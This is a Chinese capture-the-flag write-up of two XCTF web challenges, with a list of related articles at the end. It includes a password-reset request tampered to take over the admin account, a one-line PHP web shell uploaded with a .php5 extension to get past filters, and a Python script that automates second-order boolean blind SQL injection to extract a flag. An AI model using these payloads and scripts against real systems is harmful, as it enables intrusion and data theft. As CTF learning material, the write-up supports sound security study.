XCTF BUG( 越权 修改forwarded头 文件上传) UNFINSH(二次注入 python脚本) 学习过程
最近忙着入职和处理一些杂事,更新的确比较少了。不过在周末还是正好有空的,正好刷刷XCTF。
目录
XCTF BUG
注册账号
越权漏洞
文件上传
XCTF UFINISH
XCTF BUG
首先进行常规的信息收集:F12查看源码,robots.txt 文件,无果,
简单注入语句 无果 考虑到登陆界面是否有二次注入
burpsuite 简单抓包 发现cookie中只存在一个SESSION
尝试弱口令无果。
所以只能从网站的功能落手了。
注册账号
登陆进去把所有功能都点一下。
点击manage 模块 提示要以admin 登陆
越权漏洞
那么排除弱口令和注入的情况下,该怎么才能以admin身份登陆呢?
思路比较重要,毕竟CTF都是有答案的,不像一些站的关键模块怎么都早不到洞(原谅我的确菜)
点击findpwd 填好们之前注册的账号信息
点击 verify 按钮,抓包 把用户名 user 修改为admin 密码123456
可以看到返回包中显示修改成功。
以 admin 123456 登陆 进行下一步。
文件上传
点击manager功能,查看源码
moudle(是功能模块的意思)
这里也同样需要一个经验
module=filemanage&do=???
让我们差功能模块是什么 根据经验(write up)是 upload
进入
url/index.php?module=filemanage&do=upload
然后发现一个文件上传模块
简单尝试发现过滤规则
- 文件内容有前端验证 只能上传图片文件 我们可以上传一张图片改后缀
- 文件名存在后端黑名单 但可用php5 绕过
- 对文件内容有检测 不能有<?php>
针对以上过滤
- 创建一个 <script language="php">system($_GET['aaa']);</script> php文件
- 修改后缀为jpg,上传burpsuite 改包,后缀修改为 。php5
- 点击发包即可获取flag
XCTF UFINISH
信息收集
从上图可以知道是sql注入
查看源码,没啥关键的,尝试sql注入语句,发现对关键符号都有着过滤,而且必须要包含一个@符号
尝试了几个语句 发现绕不过(我觉得就算是能绕过我也绕不过|o--o|)
dirsearch-master 扫下目录
先注册一个账号起
这次总不是一张吊图了。查看源码发现没什么,但这里显示了我们的用户名
很大程度像二次注入了
buuctf XCTF October 2019 Twice SQL Injection 二次注入原理+题解_AAAAAAAAAAAA66的博客-CSDN博客
开始试验一下
难点:把注入语句写在引号里面这里,不过上图中的数据是注册不成功的,但坑的一点是不会报错,所以得不断尝试。
也就是说fuzz这个过程比较困难。过滤了 information_schema 逗号等
所以采用 + 和ascii 布尔盲注的形式
select '0'+ascii(substr(database(),1,1));
[网鼎杯2018]Unfinish - 夜幕下的灯火阑珊 - 博客园
所以直接借用大佬的脚本。(以后必须得学学这种注入脚本的写法)
#coding:utf-8
import requests
from bs4 import BeautifulSoup
import timeurl = 'http://111.200.241.244:58602/'m = ''
for i in range(100):payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}req = requests.session()r1 = req.post(url+'register.php',data = register)r2 = req.post(url+'login.php', data = login)r3 = req.post(url+'index.php')html = r3.textsoup = BeautifulSoup(html,'html.parser')UserName = soup.span.string.strip()if int(UserName) == 0:breakm += chr(int(UserName))print(m)time.sleep(1)
参考链接
2018 网鼎杯 unfinish - 知乎
[网鼎杯2018]Unfinish_fmyyy1的博客-CSDN博客
xctf-bug(绕过)_lzbzzzzz的博客-CSDN博客
XCTF BUG( 越权 修改forwarded头 文件上传) UNFINSH(二次注入 python脚本) 学习过程相关推荐
- 文件上传之二利用frame实现无页面刷新的文件上传
在上一篇文章中是将文件随表单中其他数据一起提交的,这样在提交一个表单时需要较长的时间,用户体验不是很好.一般网站选择将文件与表单的其他数据分开而单独上传.本文介绍如何利用iframe标签将上传文件模块 ...
- Retrofit实现文件上传(二)
1.序言 这几天一直在忙其他乱七八糟的事情,都没能好好敲我的代码呢?昨天,在大力大神的指点下,我对Retrofit的文件上传开悟了:在上节的解析中,我只是蜻蜓点水的提了一下Retrofit的文件上传, ...
- php文件上传后没有打开权限_记墨者靶机文件上传(二)
" 声明:该公众号大部分文章来自日常学习笔记,若是转载会先得到原作者授权或其他公众号白名单,并附上链接. 剑者,心之刃也.既可为杀,亦可为护.杀与护,不过一念之间!请勿利用文章内的相关技术从 ...
- java ftp 大文件_用Java实现FTP批量大文件上传下载(二)
2上传下载 文件的上传可以分成多线程及单线程,在单线程情况下比较简单,而在多线程的情况下,要处理的事情要多点,同时也要小心很多.下面是net.sf.jftp.net.FtpConnection的上传h ...
- cracer培训教程第一期 文件上传漏洞与命令注入漏洞
偏向php 文件包含漏洞是代码注入的一种.其原理就是注入一段用户能控制的脚本或代码,并让服务器段执行,代码注入的典型代表就是文件包含file inclusion.文件包含可能出现在jsp.php.as ...
- web文件上传(二)--使用form还是ajax
今天在群里有朋友问了这个问题,对于新手来讲这个问题确实很纠结. 在基于Restful 编程之后这个问题对于高手来说,又有另一个层面的纠结了. 先说第一个层面的问题: 需要跳转页面的时候用表单提交,不想 ...
- 渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
漏洞数据库:https://www.exploit-db.com/google-hacking-database 1.渗透测试 实用 浏览器插件 chrome.edge 插件:搜索 cookie,安装 ...
- 文件上传、文件包含和目路遍历杂谈
一.说明 文件上传.文件包含和目路遍历是<黑客防线>盛行的时代常谈的getshell手法,但到现在的安全书藉感觉就比较少提及或一笔带过.在谈的年代看不懂,在看得懂的年代又不谈了,概念感觉总 ...
- PHP代码审计7—文件上传漏洞
文章目录 一.文件上传漏洞基础 1.漏洞原理 2.常见的防御方法与绕过技巧 3.近期公布的文件上传漏洞 二.Upload-Labs 部分代码分析 1.Pass-4 后缀名黑名单检测 2.文件头白名单检 ...
最新文章
- 【bootstrap】使用支持bootstrap的时间插件daterangepicker
- html怎样同框架页面内跳转,使用iframe框架时,实现子页面内跳转到整个页面,而不是在子页面内跳转...
- c 5.6 mysql 配置文件_MySQL 5.6 5.7最优配置文件模板(my.ini)
- html page背景图片,html – Fullpage.js背景图片
- 菜鸟也要懂点设计模式|用Python设计一个请假模式
- 高斯滤波详解 附python和matlab高斯滤波代码
- Charles设置代理之后,为什么电脑和手机都不能上网
- Win10强制更新关闭方法(博主亲测,不要再走弯路啦)
- ~scanf的意思、作用
- 基于STM32cubemx的stm32f107vct6代码生成教程,实验一led闪烁
- python uppercase函数_字符串-短rot13函数-Python
- 音视频技术开发周刊 | 247
- Mockplus的组件(弹出菜单)的简单使用方法。
- 【hbase1】启动HBase服务命令
- 一劳永逸让windows 64位操作系统 禁止强制驱动签名
- FCKEditor 的使用
- 马云创办阿里和蚂蚁金服如此成功,离不开大数据和人工智能的功劳
- 44 统计高于平均分人数
- 我最喜欢的一节计算机课400字,我和计算机的故事作文400字
- “全球首台区块链路由器”极路由创始人获刑,发币救不了P2P
热门文章
- 第十一章 两个人的圣经
- 推荐一款非Win7下专用的“任务栏图标收纳”工具——TrayApp(转自:http://www.ibobosky.com/my-quick-start-tool-trayapp.htm)...
- Skipper自动获取gds里的pad坐标和label
- 计算序列 1 + 2 + 3 + ... 的前N项之和。
- flacs 安装教程_改良人工晶体安装方法在FLACS中的应用研究
- juniper SRX NTP
- xftp传输文件失败的解决方法
- mangos服务器的游戏对象和ai系统,(搬运工)Mangos服务器的游戏对象和AI系统(二)
- oracle--AWR,ADDM,ASH区别
- java enctype_ENCTYPE=multipart/form-data